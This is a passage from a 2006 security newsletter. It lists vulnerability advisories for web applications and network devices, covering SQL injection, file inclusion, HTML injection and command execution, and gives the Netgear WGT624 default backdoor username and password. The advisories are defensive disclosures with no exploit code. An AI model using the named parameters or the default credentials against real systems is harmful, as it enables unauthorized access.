• Description: phpWebSite is a content management system implemented in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "topic" parameter of the "topics.php" script. phpWebSite versions 0.10.2 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/16825

• 06.9.59 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: DCI-Taskeen Multiple SQL Injection Vulnerabilities
• Description: DCI-Taskeen is a web-based application. Insufficeint sanitization of the "id" and "action" parameters of the "basket.php" script and the "id" and "page" parameters of the "cat.php" script exposes the application to multiple SQL injection issues.
• Ref: http://www.securityfocus.com/bid/16828

• 06.9.60 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: PHP-Nuke Mainfile.PHP SQL Injection
• Description: PHP-Nuke is a web-based content management application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "mainfile.php" script. PHP-Nuke version 7.8 is vulnerable.
• Ref: http://www.waraxe.us/advisory-47.html

• 06.9.61 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Lansuite Board Module SQL Injection
• Description: Lansuite is a Lanparty administration application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "fid" parameter of the Board module. Lansuite version 2.1.0 Beta is vulnerable.
• Ref: http://milw0rm.com/id.php?id=1526 http://secunia.com/advisories/19048/

• 06.9.62 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: AddSoft StoreBot MgrLogin.ASP SQL Injection
• Description: StoreBot is web-based shopping cart software. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "Pwd" parameter of the "MgrLogin.asp" script. AddSoft StoreBot 2005 Professional Edition is vulnerable.
• Ref: http://www.securityfocus.com/bid/16897

• 06.9.63 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Sendcard Multiple Unspecified SQL Injection Vulnerabilities
• Description: Sendcard is a web-based application for the creation and sending of e-cards. Insufficient sanitization of user-supplied input exposes the application to an SQL injection issue. Sendcard versions 3.3.0 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/16900

• 06.9.64 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: DCI-Designs Dawaween Poems.PHP SQL Injection
• Description: DCI-Designs Dawaween is a web application implemented in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "id" parameter of the "poems.php" script. Dawaween version 1.03 is reportedly affected.
• Ref: http://www.securityfocus.com/bid/16909

• 06.9.65 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Woltlab Burning Board Multiple SQL Injection Vulnerabilities
• Description: Woltlab Burning Board is a bulletin board application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "fileid" parameter of the "info_db.php" and "database.php scripts. Woltlab Burning Board versions 2.7 and earlier are vulnerable.
• Ref: http://www.securityfocus.com/archive/1/426583

• 06.9.66 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: PluggedOut Nexus forgotten_password.PHP SQL Injection
• Description: PluggedOut Nexus is a web-based community application. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "forgotten_password.php" script. Nexus version 0.1 is reported to be affected.
• Ref: http://www.securityfocus.com/bid/16915/exploit

• 06.9.67 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: VUBB Index.PHP SQL Injection
• Description: VUBB is an interactive forum application, written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "pass" cookie parameter in the "index.php" script. VUBB version 0.2 is vulnerable.
• Ref: http://milw0rm.com/id.php?id=1543

• 06.9.68 - CVE: CVE-2005-3638
• Platform: Web Application
• Title: EKINboard Multiple Input Validation Vulnerabilities
• Description: EKINboard is a web-based forum application. It is vulnerable to multiple input validation issues due to insufficient sanitization of the user-supplied input. Issues include SQL injections and cross-site scripting. EKINboard version 1.0.3 is vulnerable.
• Ref: http://secunia.com/advisories/19045/

• 06.9.69 - CVE: Not Available
• Platform: Web Application
• Title: n8cms Multiple Input Validation Vulnerabilities
• Description: n8cms is a web-based content management system implemented in PHP. It is prone to multiple input validation vulnerabilities due to insufficient sanitization of user-supplied input. n8cms versions 1.2 and 1.1 are affected.
• Ref: http://www.securityfocus.com/bid/16858

• 06.9.70 - CVE: Not Available
• Platform: Web Application
• Title: ShoutLIVE Multiple Input Validation Vulnerabilities
• Description: ShoutLIVE is affected by multiple input validation issues that result in script code injection. ShoutLIVE version 1.1.0 is affected.
• Ref: http://www.securityfocus.com/bid/16857

• 06.9.71 - CVE: Not Available
• Platform: Web Application
• Title: 4images Index.PHP Remote File Include
• Description: 4images is an image gallery management application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "template" parameter of the "index.php" script. 4images version 1.7.1 is vulnerable.
• Ref: http://milw0rm.com/id.php?id=1533

• 06.9.72 - CVE: Not Available
• Platform: Web Application
• Title: Archangel Weblog Authentication Bypass
• Description: Archangel Weblog is web-based blog software implemented in PHP utilizing a MySQL backend. It is prone to an authentication bypass vulnerability due to improper validatation of user-supplied cookie data. Archangel Weblog version 0.90.2 is affected.
• Ref: http://www.securityfocus.com/bid/16848/exploit

• 06.9.73 - CVE: Not Available
• Platform: Web Application
• Title: freeForum Remote PHP Script Code Injection
• Description: freeForum is a forum application. Insufficient sanitization of the "X-Forwarded-For" and "Client-Ip" HTTP request header in the "func.inc.php" script exposes the application to a script injection issue. freeForum version 1.2 is affected.
• Ref: http://www.securityfocus.com/bid/16871

• 06.9.74 - CVE: Not Available
• Platform: Web Application
• Title: HP System Management Homepage Unspecified Directory Traversal
• Description: HP System Management Homepage (SMH) provides a web-based management interface for ProLiant and Integrity servers. It is vulnerable to an unspecified directory traversal vulnerability when dealing with the "Lang" parameter of the ".namazurc" resource file. HP System Management Homepage versions 2.1.4 and earlier are vulnerable.
• Ref: http://secunia.com/advisories/19059/

• 06.9.75 - CVE: Not Available
• Platform: Web Application
• Title: DEV Web Management System HTML Injection
• Description: DEV Web Management System is a content management application. It is prone to an HTML injection vulnerability due to insufficient sanitization of user-supplied input to the "City/Region" field on the account registration page. DEV Web Management System version 1.5 is vulnerable.
• Ref: http://www.securityfocus.com/bid/16812/references

• 06.9.76 - CVE: Not Available
• Platform: Web Application
• Title: SPiD Scan_Lang_Insert.PHP Local File Include
• Description: SPiD is a web-based gallery management application. It is prone to a local file include vulnerability due to improper sanitization of user-supplied input to the "lang" parameter of the "scan_lang_insert.php" script before using it in an "include()" call. SPiD version 1.3.1 is affected.
• Ref: http://www.securityfocus.com/bid/16822/exploit

• 06.9.77 - CVE: Not Available
• Platform: Web Application
• Title: FreeHostShop Website Generator Arbitrary File Upload
• Description: Website Generator is a web-based content management system implemented in PHP. It is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process.
• Ref: http://www.securityfocus.com/archive/1/426077

• 06.9.78 - CVE: Not Available
• Platform: Web Application
• Title: iGenus WebMail Config_Inc.PHP Remote File Include
• Description: iGenus WebMail is a web email client application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "_SG_HOME" variable of the "config_inc.php" script. iGENUS WebMail versions 2.0.2 and earlier are vulnerable.
• Ref: http://retrogod.altervista.org/igenus_202_xpl_pl.html

• 06.9.79 - CVE: Not Available
• Platform: Web Application
• Title: Simple Machines X-Forwarded-For HTML Injection
• Description: Simple Machines Forum (SMF) is a web forum application. Insufficient sanitization of the "X-Forwarded-For" header in the "Sources/Register.php" script exposes the application to an HTML injection issue. Simple Machines versions 1.0.6 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/16841

• 06.9.80 - CVE: Not Available
• Platform: Web Application
• Title: freeForum Multiple HTML Injection Vulnerabilities
• Description: freeForum is a forum application. It is vulnerable to multiple HTML injection issues due to insufficient sanitization of user-supplied input to the "name" and "subject" parameters of the "func.inc.php" script. freeForum version 1.2 is vulnerable.
• Ref: http://soft.zoneo.net/freeForum/changes.php

• 06.9.81 - CVE: Not Available
• Platform: Web Application
• Title: WordPress Multiple HTML Injection Vulnerabilities
• Description: WordPress is a web-based publishing application. Insufficient sanitization of the "name" and "website" field on the "post comment" page exposes the application to HTML injection issues. WordPress version 2.0.1 is affected.
• Ref: http://www.securityfocus.com/bid/16880

• 06.9.82 - CVE: Not Available
• Platform: Web Application
• Title: PEHEPE Membership Management System PHP Script Code Injection
• Description: PEHEPE Membership Management System is a forum application. It is vulnerable to a remote PHP script code injection issue due to insufficient input sanitization of the "uye_klasor" parameter of the "sol_menu.php" script. PEHEPE Membership Management System version 3 is vulnerable. Ref: http://yns.zaxaz.com/2006/02/28/pehepe-membership-management-system-multiple-vulnerabilities/

• 06.9.83 - CVE: Not Available
• Platform: Web Application
• Title: Limbo CMS Frontpage Arbitrary PHP Command Execution
• Description: Limbo CMS is a web-based content management system. It is prone to an arbitrary command execution vulnerability due to improper sanitization of user-supplied input to the "Itemid" parameter in the "index.php" script. Limbo CMS versions 1.0.4.2 and 1.0.4.1 are vulnerable.
• Ref: http://www.securityfocus.com/bid/16902/exploit

• 06.9.84 - CVE: Not Available
• Platform: Web Application
• Title: Issue Dealer Information Disclosure
• Description: Issue Dealer is an issue tracking web application. It is vulnerable to an information disclosure issue because it allows remote attackers to guess URIs of unpublished content in a brute force manner. Issue Dealer versions 0.9.95 and earlier are vulnerable.
• Ref: http://issuedealer.com/changes

• 06.9.85 - CVE: Not Available
• Platform: Web Application
• Title: SMBlog Arbitrary PHP Command Execution
• Description: SMBlog is a web log application. It is vulnerable to an arbitrary command execution issue due to insufficient sanitization of user-supplied input to the "pg" parameter of the "index.php" script. SMBlog version 1.2 is vulnerable.
• Ref: http://www.securityfocus.com/archive/1/426498

• 06.9.86 - CVE: Not Available
• Platform: Web Application
• Title: UKiWEB UKiBoard FCE.PHP BBCode HTML Injection
• Description: UKiWEB UKiBoard is a web-based bulletin board. It is prone to an HTML-injection vulnerability due to improper sanitization of user-supplied input to the "show_post()" function of the "fce.php" script. UKiBoard version 3.0.1 is vulnerable.
• Ref: http://evuln.com/vulns/90/summary.html

• 06.9.87 - CVE: Not Available
• Platform: Web Application
• Title: LogIT Remote File Include
• Description: LogIT is a logging and statistics application written in PHP. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "pg" URI parameter of the "index.php" script. LogIT versions 1.3 and 1.4 are affected by this vulnerability.
• Ref: http://www.securityfocus.com/bid/16932

• 06.9.88 - CVE: Not Available
• Platform: Web Application
• Title: NZ Ecommerce Multiple Input Validation Vulnerabilities
• Description: NZ Ecommerce is a shopping cart system. The application is prone to multiple input validation vulnerabilities due to improper sanitization of user-supplied input. SQL injection attacks are possible through the "informationID" and "ParentCategory" parameters of "index.php". Cross-site scripting attacks are possible through the "action" parameter of "index.php". NZ Ecommerce System version 0 is affected.
• Ref: http://www.securityfocus.com/bid/16931/exploit

• 06.9.89 - CVE: Not Available
• Platform: Network Device
• Title: NuFW Remote TLS Connection Handling Denial of Service
• Description: NuFW is a freely available, open source authenticating network application proxy firewall. It is susceptible to a remote Denial of Service vulnerability. This issue is due to a failure of the application to properly handle excessive authentication requests. NuFW versions prior to 1.0.21 are affected by this issue.
• Ref: http://www.nufw.org/+NuFW-1-21-minor-security-fix+.html

• 06.9.90 - CVE: CVE-2004-2556, CVE-2004-2557
• Platform: Network Device
• Title: Netgear WGT624 Wireless Access Point Default Backdoor Account
• Description: Netgear WGT624 contains a default administrative account with a username of "Gearguy" and the password "Geardog". A remote attacker can gain complete access to a vulnerable access point by using the default credentials.
• Ref: http://www.securityfocus.com/bid/16933

• 06.9.91 - CVE: Not Available
• Platform: Network Device
• Title: Netgear WGT624 Wireless Firewall Router Information Disclosure
• Description: NetGear WGT624 Wireless Firewall Router is a hardware appliance. It is vulnerable to information disclosure when the backup settings are enabled. The backup file contains authentication credentials in cleartext. NetGear model WGT624 is vulnerable.
• Ref: http://www.securityfocus.com/archive/1/426185

• 06.9.92 - CVE: Not Available
• Platform: Network Device
• Title: Compex NetPassage WPE54G Denial Of Service
• Description: NetPassage WPE54G is a wireless access point. It is prone to a remote denial of service vulnerability due to improper handling of user-supplied input. The problem occurs when the device receives malformed UDP packets to UDP port 7778.
• Ref: http://www.securityfocus.com/bid/16894

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.